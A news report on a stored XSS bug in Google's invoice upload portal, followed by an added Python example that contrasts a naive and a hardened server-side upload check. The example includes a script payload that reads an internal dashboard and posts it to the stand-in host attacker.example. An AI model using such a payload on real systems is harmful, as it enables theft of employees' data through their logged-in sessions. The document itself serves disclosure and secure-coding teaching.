The vulnerability was discovered in February this year by security researcher Thomas Orlita and was patched in mid-April, but details have only now been made public.
XSS IN GOOGLE’s INVOICING PORTAL
The flaw affected the Google Invoice Submission Portal, a public website to which Google directs its business partners to submit invoices for work done under their contracts.
It is a cross-site scripting (XSS) vulnerability, and a stored one: the malicious content was saved on Google's side and served to Google employees later.
Most XSS flaws are considered low-severity, but in rare cases they can have serious consequences. Orlita's discovery was one of those cases. According to the researcher, an attacker could upload a malformed file through the Upload Invoice field on the Google Invoice Submission Portal. Using an intercepting proxy, the attacker could modify the upload in transit, after the form's validation had run and the request had been submitted, swapping the PDF for an HTML document carrying an XSS payload. The root cause is a classic one: a check performed in the browser is not a check at all, because the attacker controls everything the browser sends.

The file would then be stored in Google's invoicing backend, and the payload would execute automatically when an employee opened it.

“Since the XSS was run on a googleplex.com subdomain while employees are logged in, an attacker should be in a position to access the dashboard on the subdomain where the invoices can be viewed and managed,” Orlita told ZDNet by email. “Any other internal applications on this domain may be accessible, depending on whether cookies are configured on googleplex.com,” the researcher added.

Since most of Google's internal applications are hosted on googleplex.com, this opens the door to a wide range of possibilities for attackers. As with most XSS bugs, however, the real-world impact would have depended on the attacker's ability to pivot from it into more complex attacks.

“The seriousness of the impact depends, of course, on how well it can be used to access internal sites,” Orlita said. “For example, an attacker could try to phish an employee.”

More technical details about the XSS bug are available in Orlita's official vulnerability disclosure.
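How the bypass works and what a server-side fix looks like, as an added Python example. This is not code from Google or from Orlita's disclosure: the multipart upload bodies are constructed to mimic a browser request and the same request after it has been edited in a proxy, and the field name `invoice`, the host `attacker.example`, and the `check_upload_*` / `response_headers_*` function names are all hypothetical.

```python
"""Stored XSS via a 'validated' invoice upload: the bypass and the server-side fix.

Added example, not code from Google or from Orlita's disclosure. The multipart
bodies below are constructed; the field name, the attacker host and the
function names are hypothetical.
"""
import re

BOUNDARY = b"----ExampleBoundaryabc123"  # constructed, as a browser would pick one


def build_multipart(filename: bytes, content_type: bytes, body: bytes) -> bytes:
    """Build a one-file multipart/form-data body the way a browser would."""
    return (
        b"--" + BOUNDARY + b"\r\n"
        + b'Content-Disposition: form-data; name="invoice"; filename="' + filename + b'"\r\n'
        + b"Content-Type: " + content_type + b"\r\n"
        + b"\r\n"
        + body + b"\r\n"
        + b"--" + BOUNDARY + b"--\r\n"
    )


# What the browser sends once its own file-type check has passed: a real PDF.
LEGIT_UPLOAD = build_multipart(
    b"invoice.pdf", b"application/pdf",
    b"%PDF-1.4\n1 0 obj\n<< /Type /Catalog >>\nendobj\n%%EOF\n",
)

# The same request after the attacker edits it in a proxy: the filename still
# says .pdf (so anything keyed on the name still passes), but the declared type
# and the body are now HTML. The script reads the internal dashboard with the
# viewing employee's session and posts it to a hypothetical attacker host.
XSS_PAYLOAD = (
    b"<html><body><script>"
    b"fetch('/invoices/dashboard').then(r=>r.text()).then(t=>"
    b"fetch('https://attacker.example/c',{method:'POST',body:t}));"
    b"</script></body></html>"
)
TAMPERED_UPLOAD = build_multipart(b"invoice.pdf", b"text/html", XSS_PAYLOAD)


def parse_part(raw: bytes) -> dict:
    """Pull filename, declared Content-Type and file bytes out of the one part."""
    _, rest = raw.split(b"--" + BOUNDARY + b"\r\n", 1)
    headers, body = rest.split(b"\r\n\r\n", 1)
    body = body.rsplit(b"\r\n--" + BOUNDARY + b"--", 1)[0]
    filename = re.search(rb'filename="([^"]*)"', headers).group(1).decode()
    ctype = re.search(rb"Content-Type: ([^\r\n]+)", headers).group(1).decode()
    return {"filename": filename, "content_type": ctype, "data": body}


def check_upload_naive(part: dict) -> bool:
    """Repeats the browser's check on the server: extension only. Everything it
    looks at came from the client, so a proxy-edited request sails through."""
    return part["filename"].lower().endswith(".pdf")


def check_upload_hardened(part: dict) -> bool:
    """Decide by what the bytes are, not by what the client says they are:
    the body must carry the PDF magic, and name and declared type must agree."""
    looks_like_pdf = part["data"].startswith(b"%PDF-")
    return looks_like_pdf and check_upload_naive(part) and part["content_type"] == "application/pdf"


def response_headers_naive(part: dict) -> dict:
    """Serves the stored file with the type the uploader declared. For the
    tampered upload that is text/html, so the employee's browser renders the
    script inside the portal's origin, with the employee's session attached."""
    return {"Content-Type": part["content_type"]}


def response_headers_hardened(part: dict) -> dict:
    """Type is derived from the validated content, never from the upload, and
    the browser is told not to sniff, not to render inline, and to run nothing,
    so even a file that slipped past the check cannot execute as the app."""
    ctype = "application/pdf" if part["data"].startswith(b"%PDF-") else "application/octet-stream"
    return {
        "Content-Type": ctype,
        "X-Content-Type-Options": "nosniff",
        "Content-Disposition": 'attachment; filename="invoice.pdf"',
        "Content-Security-Policy": "sandbox",
    }


if __name__ == "__main__":
    for label, raw in (("legit", LEGIT_UPLOAD), ("tampered", TAMPERED_UPLOAD)):
        p = parse_part(raw)
        print(f"{label}: naive={check_upload_naive(p)} hardened={check_upload_hardened(p)} "
              f"served as {response_headers_naive(p)['Content-Type']} (naive) / "
              f"{response_headers_hardened(p)['Content-Type']} (hardened)")
```

The naive check accepts the tampered request because every value it inspects was chosen by the client; the hardened check accepts only the genuine PDF, and the hardened response headers mean that a file which somehow slipped through would be downloaded as an opaque attachment rather than rendered in the portal's origin. Serving uploaded files from a separate, cookieless origin removes the employee's session from the picture altogether and is the stronger fix.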